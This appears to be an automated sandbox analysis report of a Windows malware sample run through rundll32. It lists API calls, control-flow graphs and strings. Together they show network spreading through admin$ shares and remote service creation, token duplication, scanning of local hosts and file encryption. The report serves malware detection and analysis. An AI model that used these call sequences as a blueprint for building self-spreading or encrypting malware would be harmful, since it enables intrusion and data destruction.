WNetAddConnection2W PathFileExistsW 6344->6345 6346 4bf9ceb 6345->6346 6347 4bf9c73 GetLastError 6345->6347 6346->6339 6349 4bf9eef WNetCancelConnection2W 6346->6349 6348 4bf87e7 3 API calls 6347->6348 6355 4bf9c94 6348->6355 6349->6339 6350 4bf9c9a GetLastError 6350->6346 6350->6355 6351 4bf9cf3 6352 4bf9d0e GetCurrentThread OpenThreadToken 6351->6352 6356 4bf68b5 15 API calls 6351->6356 6353 4bf9d2c DuplicateTokenEx 6352->6353 6354 4bf9d42 memset GetSystemDirectoryW 6352->6354 6353->6354 6357 4bf9d9e PathAppendW PathFileExistsW 6354->6357 6358 4bf9eb0 GetLastError 6354->6358 6355->6339 6355->6346 6355->6350 6355->6351 6365 4bf9cd4 WNetCancelConnection2W 6355->6365 6359 4bf9d08 6356->6359 6360 4bf9ebe DeleteFileW 6357->6360 6361 4bf9dc5 wsprintfW 6357->6361 6362 4bf9eb6 6358->6362 6359->6352 6363 4bf9ecd 6360->6363 6387 4bf9972 6361->6387 6362->6360 6362->6363 6366 4bf9edc 6363->6366 6367 4bf9ed4 CloseHandle 6363->6367 6365->6345 6366->6346 6369 4bf9ee1 CloseHandle 6366->6369 6367->6366 6368 4bf9df2 6370 4bf9ea6 GetLastError 6368->6370 6371 4bf9e2c CreateProcessW 6368->6371 6372 4bf9e21 CreateProcessAsUserW 6368->6372 6369->6346 6370->6362 6373 4bf9e32 6371->6373 6372->6373 6373->6370 6374 4bf9e36 WaitForSingleObject GetExitCodeProcess 6373->6374 6375 4bf9e5b 6374->6375 6376 4bf9e56 CloseHandle 6374->6376 6377 4bf9e65 6375->6377 6378 4bf9e60 CloseHandle 6375->6378 6376->6375 6379 4bf9e6f 6377->6379 6380 4bf9e6a CloseHandle 6377->6380 6378->6377 6381 4bf9e79 6379->6381 6382 4bf9e74 CloseHandle 6379->6382 6380->6379 6383 4bf9e7e CloseHandle 6381->6383 6384 4bf9e83 6381->6384 6382->6381 6383->6384 6384->6363 6385 4bf9e92 PathFileExistsW 6384->6385 6385->6362 6386->6316 6388 4bf997f 6387->6388 6389 4bf88d3 PathFindFileNameW 6388->6389 6390 4bf9992 wsprintfW 6389->6390 6391 4bf9abd 6390->6391 6391->6391 6392 4bf9ae9 wsprintfW 6391->6392 6393 4bf6735 18 API calls 6392->6393 6394 4bf9b28 wsprintfW 6393->6394 6394->6368 6396->6326 6398 4bf9534 67 API calls 6397->6398 6399 4bf98a2 6398->6399 6401 4bf735b GetProcAddress 6400->6401 6402 4bf7425 6400->6402 6403 4bf7414 GetLastError 6401->6403 6404 4bf7373 GetProcessHeap RtlAllocateHeap 6401->6404 6402->6277 6405 4bf741a FreeLibrary 6403->6405 6404->6405 6409 4bf7398 6404->6409 6405->6402 6406 4bf7402 GetProcessHeap RtlFreeHeap 6406->6405 6407 4bf73c0 wsprintfW 6408 4bf6b95 14 API calls 6407->6408 6408->6409 6409->6406 6409->6407 6411 4bf7458 6410->6411 6413 4bf7451 6410->6413 6412 4bf7461 GetProcessHeap HeapAlloc 6411->6412 6411->6413 6412->6413 6414 4bf7480 GetIpNetTable 6412->6414 6413->6277 6415 4bf748c 6414->6415 6416 4bf7502 GetProcessHeap HeapFree 6414->6416 6415->6416 6417 4bf74bc wsprintfW 6415->6417 6419 4bf74fe 6415->6419 6416->6413 6418 4bf6b95 14 API calls 6417->6418 6418->6415 6419->6416 6425 4bf7556 6420->6425 6421 4bf755d 6422 4bf75cf 6421->6422 6423 4bf75c6 NetApiBufferFree 6421->6423 6422->6281 6423->6422 6424 4bf751b 14 API calls 6424->6425 6425->6421 6425->6422 6425->6424 6426 4bf6b95 14 API calls 6425->6426 6426->6425 6428 4bfa760 6427->6428 6429 4bf8b3e memset memset GetAdaptersInfo 6428->6429 6430 4bf8d2e 6429->6430 6431 4bf8b9a LocalAlloc 6429->6431 6431->6430 6432 4bf8bb4 GetAdaptersInfo 6431->6432 6433 4bf8d24 LocalFree 6432->6433 6439 4bf8bc4 6432->6439 6433->6430 6434 4bf8c77 6452 4bf7d4e NetServerGetInfo 6434->6452 6435 4bf8bd2 inet_addr inet_addr 6437 4bf641a 4 API calls 6435->6437 6437->6439 6439->6434 6439->6435 6443 4bf6b95 14 API calls 6439->6443 6446 4bf641a 4 API calls 6439->6446 6450 4bf6b95 14 API calls 6439->6450 6440 4bf8c88 6442 4bf8d0d 6440->6442 6444 4bf8c94 LocalAlloc 6440->6444 6449 4bf8ccf htonl htonl CreateThread 6440->6449 6442->6433 6447 4bf8d13 FindCloseChangeNotification 6442->6447 6445 4bf8c1f GetProcessHeap HeapFree 6443->6445 6444->6440 6448 4bf8ca4 inet_addr 6444->6448 6445->6439 6446->6439 6447->6433 6447->6447 6448->6440 6449->6440 6469 4bf8ab3 6449->6469 6451 4bf8c57 GetProcessHeap HeapFree 6450->6451 6451->6439 6453 4bf7d6c 6452->6453 6454 4bf7d88 6453->6454 6455 4bf7d81 NetApiBufferFree 6453->6455 6454->6440 6456 4bf8d39 GetComputerNameExW DhcpEnumSubnets 6454->6456 6455->6454 6457 4bf8ea0 6456->6457 6458 4bf8db0 6456->6458 6457->6440 6459 4bf8e97 DhcpRpcFreeMemory 6458->6459 6460 4bf8dc0 DhcpGetSubnetInfo 6458->6460 6461 4bf8de8 DhcpEnumSubnetClients 6458->6461 6462 4bf8e7e DhcpRpcFreeMemory 6458->6462 6463 4bf8e2e htonl 6458->6463 6465 4bf8e42 htonl inet_ntoa 6458->6465 6467 4bf6b95 14 API calls 6458->6467 6459->6457 6460->6458 6461->6458 6462->6458 6464 4bfa567 8 API calls 6463->6464 6464->6458 6466 4bf641a 4 API calls 6465->6466 6466->6458 6468 4bf8e63 GetProcessHeap HeapFree 6467->6468 6468->6458 6470 4bf8b1e LocalFree 6469->6470 6471 4bf8acd 6469->6471 6471->6470 6472 4bf8ad3 htonl 6471->6472 6474 4bf8ae0 htonl inet_ntoa 6471->6474 6476 4bf6b95 14 API calls 6471->6476 6473 4bfa567 8 API calls 6472->6473 6473->6471 6475 4bf641a 4 API calls 6474->6475 6475->6471 6477 4bf8b00 GetProcessHeap HeapFree 6476->6477 6477->6471 6497 4bf682f 6498 4bf683a 6497->6498 6502 4bf6865 6497->6502 6499 4bf684e GetProcessHeap HeapFree 6498->6499 6500 4bf6856 6498->6500 6499->6500 6501 4bf685d GetProcessHeap HeapFree 6500->6501 6500->6502 6501->6502 6503 4bfc4a6 free 6504 4bface4 6509 4bfa8be 6504->6509 6505 4bfbecb 3 API calls 6507 4bfaed0 6505->6507 6506 4bfbb4f 6506->6505 6506->6507 6508 4bfac8f memcpy 6508->6509 6509->6506 6509->6507 6509->6508

                                              Executed Functions

                                              Function 04BF9534 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 244servicesharesleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 60 4bf9534-4bf955a call 4bfa760 63 4bf985f 60->63 64 4bf9560-4bf9604 wsprintfW call 4bf88d3 wsprintfW * 2 PathFindExtensionW 60->64 66 4bf9867-4bf986c 63->66 70 4bf960b-4bf9625 wsprintfW 64->70 71 4bf9606-4bf9608 64->71 68 4bf986e-4bf9872 66->68 69 4bf9874-4bf9888 SetLastError 66->69 68->69 72 4bf962a-4bf9651 WNetAddConnection2W PathFileExistsW 70->72 71->70 73 4bf96c8-4bf96d0 72->73 74 4bf9653-4bf9672 GetLastError call 4bf87e7 72->74 75 4bf9844-4bf9849 73->75 79 4bf96d5-4bf96d8 74->79 80 4bf9674-4bf967d GetLastError 74->80 75->66 78 4bf984b-4bf985d WNetCancelConnection2W 75->78 78->66 81 4bf96da-4bf96dd 79->81 82 4bf96f4-4bf9720 call 4bf944f OpenSCManagerW 79->82 80->75 83 4bf9683-4bf9686 80->83 81->82 84 4bf96df-4bf96ea call 4bf68b5 81->84 92 4bf982a-4bf982c GetLastError 82->92 93 4bf9726-4bf978f memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 82->93 83->75 86 4bf968c-4bf968f 83->86 84->82 86->75 89 4bf9695-4bf969d 86->89 89->75 90 4bf96a3-4bf96a7 89->90 90->66 94 4bf96ad-4bf96c3 WNetCancelConnection2W 90->94 95 4bf9830-4bf9834 92->95 96 4bf9809-4bf9814 GetLastError 93->96 97 4bf9791-4bf97a4 StartServiceW 93->97 94->72 95->75 100 4bf9836-4bf983e DeleteFileW 95->100 98 4bf981e-4bf9828 CloseServiceHandle 96->98 99 4bf9816 96->99 101 4bf97a6-4bf97b1 GetLastError 97->101 102 4bf97c2-4bf97c7 97->102 98->95 99->98 100->75 104 4bf97ba 101->104 105 4bf97b3-4bf97b8 101->105 103 4bf97cc-4bf97dd QueryServiceStatus 102->103 106 4bf97df-4bf97e4 103->106 107 4bf97f3-4bf9807 DeleteService CloseServiceHandle 103->107 104->102 105->104 105->107 106->107 108 4bf97e6-4bf97f1 Sleep 106->108 107->98 108->103 108->107
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF957E
                                                • Part of subcall function 04BF88D3: PathFindFileNameW.SHLWAPI(04C07BC8,75A373E0,?,04BF95B2), ref: 04BF88E3
                                              • wsprintfW.USER32 ref: 04BF95C9
                                              • wsprintfW.USER32 ref: 04BF95EF
                                              • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 04BF95FC
                                              • wsprintfW.USER32 ref: 04BF961A
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04BF9637
                                              • PathFileExistsW.SHLWAPI(?), ref: 04BF9649
                                              • GetLastError.KERNEL32 ref: 04BF9653
                                              • GetLastError.KERNEL32(?), ref: 04BF9674
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF96B9
                                              • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04BF9714
                                              • memset.MSVCRT ref: 04BF9735
                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04BF9742
                                              • wsprintfW.USER32 ref: 04BF975A
                                              • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04BF9783
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04BF9798
                                              • GetLastError.KERNEL32 ref: 04BF97A6
                                              • QueryServiceStatus.ADVAPI32(?,?), ref: 04BF97D5
                                              • Sleep.KERNEL32(00001388), ref: 04BF97E7
                                              • DeleteService.ADVAPI32(?), ref: 04BF97F7
                                              • CloseServiceHandle.ADVAPI32(?), ref: 04BF9801
                                              • GetLastError.KERNEL32 ref: 04BF9809
                                              • CloseServiceHandle.ADVAPI32(?), ref: 04BF9822
                                              • GetLastError.KERNEL32 ref: 04BF982A
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6921
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                                • Part of subcall function 04BF68B5: HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                                • Part of subcall function 04BF68B5: memcpy.MSVCRT ref: 04BF6978
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF6998
                                                • Part of subcall function 04BF68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                                • Part of subcall function 04BF68B5: HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              • DeleteFileW.KERNEL32(?), ref: 04BF983E
                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04BF9857
                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04BFA0AD,00000000,00000000,00000000,00000000,04BF6AA8,00000000,00000000,00000000,00000024,04BF6AA8), ref: 04BF9878
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                              • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                              • API String ID: 719309661-1529897384
                                              • Opcode ID: ec7c980df0497e392a4a45365dd8d345f1714d8e4cfc13ce9a325bb740526ea3
                                              • Instruction ID: f122748c4973288663fb31bd0226167efbdebad9cd92ebf63985b1ebac6759a2
                                              • Opcode Fuzzy Hash: ec7c980df0497e392a4a45365dd8d345f1714d8e4cfc13ce9a325bb740526ea3
                                              • Instruction Fuzzy Hash: A39108B1508345ABEB209F64DC88B9BB7ECEF84744F40096EF649C3150E774E9488BA2
                                              Function 04BF8B2E Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 158memorythreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 136 4bf8b2e-4bf8b94 call 4bfa760 memset * 2 GetAdaptersInfo 139 4bf8d2e-4bf8d36 136->139 140 4bf8b9a-4bf8bae LocalAlloc 136->140 140->139 141 4bf8bb4-4bf8bbe GetAdaptersInfo 140->141 142 4bf8d24-4bf8d28 LocalFree 141->142 143 4bf8bc4-4bf8bcc 141->143 142->139 144 4bf8c77-4bf8c7e call 4bf7d4e 143->144 145 4bf8bd2-4bf8c12 inet_addr * 2 call 4bf641a 143->145 150 4bf8c88-4bf8c8c 144->150 151 4bf8c80-4bf8c83 call 4bf8d39 144->151 152 4bf8c14-4bf8c2b call 4bf6b95 GetProcessHeap HeapFree 145->152 153 4bf8c31-4bf8c37 145->153 155 4bf8c8e 150->155 156 4bf8d0d-4bf8d11 150->156 151->150 152->153 158 4bf8c69-4bf8c71 153->158 159 4bf8c39-4bf8c4b call 4bf641a 153->159 160 4bf8c94-4bf8ca2 LocalAlloc 155->160 156->142 163 4bf8d13-4bf8d22 FindCloseChangeNotification 156->163 158->143 158->144 159->158 168 4bf8c4d-4bf8c63 call 4bf6b95 GetProcessHeap HeapFree 159->168 164 4bf8cff-4bf8d0b 160->164 165 4bf8ca4-4bf8cc3 inet_addr 160->165 163->142 163->163 164->156 164->160 165->164 167 4bf8cc5-4bf8ccd 165->167 167->164 169 4bf8ccf-4bf8cf5 htonl * 2 CreateThread 167->169 168->158 169->164 171 4bf8cf7-4bf8cfb 169->171 171->164
                                              APIs
                                              • memset.MSVCRT ref: 04BF8B52
                                              • memset.MSVCRT ref: 04BF8B6F
                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04BF8B8F
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04BF8BA0
                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04BF8BBA
                                              • inet_addr.WS2_32(000001B0), ref: 04BF8BDF
                                              • inet_addr.WS2_32(000001C0), ref: 04BF8BF3
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,75C95350,?), ref: 04BF6439
                                                • Part of subcall function 04BF641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF6446
                                                • Part of subcall function 04BF641A: HeapAlloc.KERNEL32(00000000), ref: 04BF644D
                                                • Part of subcall function 04BF641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04BF6465
                                              • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04BF8C24
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8C2B
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04BF8C5C
                                              • HeapFree.KERNEL32(00000000), ref: 04BF8C63
                                              • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04BF8C98
                                              • inet_addr.WS2_32(255.255.255.255), ref: 04BF8CA9
                                              • htonl.WS2_32(?), ref: 04BF8CD0
                                              • htonl.WS2_32(?), ref: 04BF8CD8
                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 04BF8CED
                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04BF8D17
                                              • LocalFree.KERNEL32(?), ref: 04BF8D28
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$ChangeCloseCreateFindNotificationThread
                                              • String ID: 255.255.255.255
                                              • API String ID: 569246953-2422070025
                                              • Opcode ID: ec9a0b3548fb728821dfc45a25d4649b91c99f8b6bcd52f545b38424b69ebac4
                                              • Instruction ID: 291a176444f33468f986f362de8d933cb7caa9a1fd6a08c2a3af17432ed04a61
                                              • Opcode Fuzzy Hash: ec9a0b3548fb728821dfc45a25d4649b91c99f8b6bcd52f545b38424b69ebac4
                                              • Instruction Fuzzy Hash: 38516AB1904306AFD710EF64DC8496EBBE9FF88314F10496EFA9997100D734E9598BA2
                                              Function 04BF15A7 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152encryptionmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 278 4bf15a7-4bf15eb GetProcessHeap HeapAlloc 279 4bf173d-4bf1744 278->279 280 4bf15f1-4bf160b CryptAcquireContextW 278->280 280->279 281 4bf1611-4bf161b 280->281 282 4bf16be-4bf16d2 CryptCreateHash 281->282 283 4bf1621-4bf1622 281->283 286 4bf16d4 282->286 287 4bf1712-4bf1715 282->287 284 4bf1628-4bf163c GetProcessHeap HeapAlloc 283->284 285 4bf1710 283->285 284->285 290 4bf1642-4bf1676 CryptImportKey 284->290 285->287 291 4bf16d8-4bf16dc 286->291 288 4bf1717-4bf171a CryptDestroyHash 287->288 289 4bf1720-4bf1723 287->289 288->289 292 4bf172e-4bf1731 289->292 293 4bf1725-4bf1728 CryptDestroyKey 289->293 294 4bf16aa-4bf16bc GetProcessHeap HeapFree 290->294 295 4bf1678-4bf1690 CryptCreateHash 290->295 291->287 296 4bf16de-4bf16f0 CryptHashData 291->296 292->279 298 4bf1733-4bf1737 CryptReleaseContext 292->298 293->292 294->291 295->294 299 4bf1692-4bf16a4 CryptSetHashParam 295->299 296->287 297 4bf16f2-4bf1709 CryptGetHashParam 296->297 297->287 300 4bf170b-4bf170e 297->300 298->279 299->294 301 4bf16a6 299->301 300->287 301->294
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000010,77735E70,?,771AF380), ref: 04BF15D9
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF15E2
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04BF1603
                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04BF1633
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF1636
                                              • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 04BF166E
                                              • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04BF1688
                                              • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 04BF169C
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF16AD
                                              • HeapFree.KERNEL32(00000000), ref: 04BF16B4
                                              • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 04BF16CA
                                              • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 04BF16E8
                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04BF1701
                                              • CryptDestroyHash.ADVAPI32(?), ref: 04BF171A
                                              • CryptDestroyKey.ADVAPI32(?), ref: 04BF1728
                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04BF1737
                                              Strings
                                              • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04BF15F8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                              • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                              • API String ID: 2620112963-1948191093
                                              • Opcode ID: ada603228794e4692d907979f411f858002c7cf0ed31055dcb4ce494f626fadd
                                              • Instruction ID: 8dc8fa1cbe083a3e6cc5eabe4b72fe8094ed717737a6cc0143330314a374f340
                                              • Opcode Fuzzy Hash: ada603228794e4692d907979f411f858002c7cf0ed31055dcb4ce494f626fadd
                                              • Instruction Fuzzy Hash: F2516A71A00219FBEF108FA9DC48A9EBB79FF08750F004495FA0AE6190DB709E05DBA0
                                              Function 04BF6FFE Relevance: 25.6, APIs: 17, Instructions: 125memorypipesleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04BF7025
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF7028
                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 04BF703C
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF7051
                                              • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 04BF706F
                                              • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 04BF707F
                                              • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 04BF709F
                                              • Sleep.KERNELBASE(000003E8), ref: 04BF70B3
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF70C4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF70C7
                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 04BF70E2
                                              • StrChrW.SHLWAPI(00000000,0000003A), ref: 04BF70F7
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF7114
                                              • HeapFree.KERNEL32(00000000), ref: 04BF7117
                                              • FlushFileBuffers.KERNEL32(?), ref: 04BF7120
                                              • DisconnectNamedPipe.KERNEL32(?), ref: 04BF7129
                                              • CloseHandle.KERNEL32(?), ref: 04BF7132
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                              • String ID:
                                              • API String ID: 1225799970-0
                                              • Opcode ID: edf9b6147e9a5a546f1b3f62dc43a756ef05bc7ea69f4ad4868f5d2736cfda03
                                              • Instruction ID: 4d58856dca1bf1c6818c2adbadd93f1e73df0343896832a503e9fbf51b4d8430
                                              • Opcode Fuzzy Hash: edf9b6147e9a5a546f1b3f62dc43a756ef05bc7ea69f4ad4868f5d2736cfda03
                                              • Instruction Fuzzy Hash: 09415E31A00218BBEB215BB5DC49EAFBF3DEF45750F000495FA0AE6090CB749A58DAB0
                                              Function 04BF5BC4 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127fileencryptionmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04BF5E4C,?,?,00000000), ref: 04BF5BE3
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BF5C14
                                              • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C39
                                              • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C5D
                                              • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C75
                                              • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5C8B
                                              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CA4
                                              • memcpy.MSVCRT ref: 04BF5CB8
                                              • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04BF5E4C,?,?), ref: 04BF5CDC
                                              • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CE8
                                              • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CF1
                                              • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04BF5CFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                              • String ID: encrypted
                                              • API String ID: 3326259677-1467498611
                                              • Opcode ID: 9ead68c9b719d52c198051fd53aa1610727ac1b85e9a240cd1e5abebb4ebae9e
                                              • Instruction ID: 4b076f6ee3994404a7dddd4ba5622b229d945c4e4486035509798a33592ef22f
                                              • Opcode Fuzzy Hash: 9ead68c9b719d52c198051fd53aa1610727ac1b85e9a240cd1e5abebb4ebae9e
                                              • Instruction Fuzzy Hash: 3141F8B1A00109BFDB10DF64DD48EAE7BB9FB44344F058165FA0AE7250EB75AE148BA0
                                              Function 04BF1EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 161memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
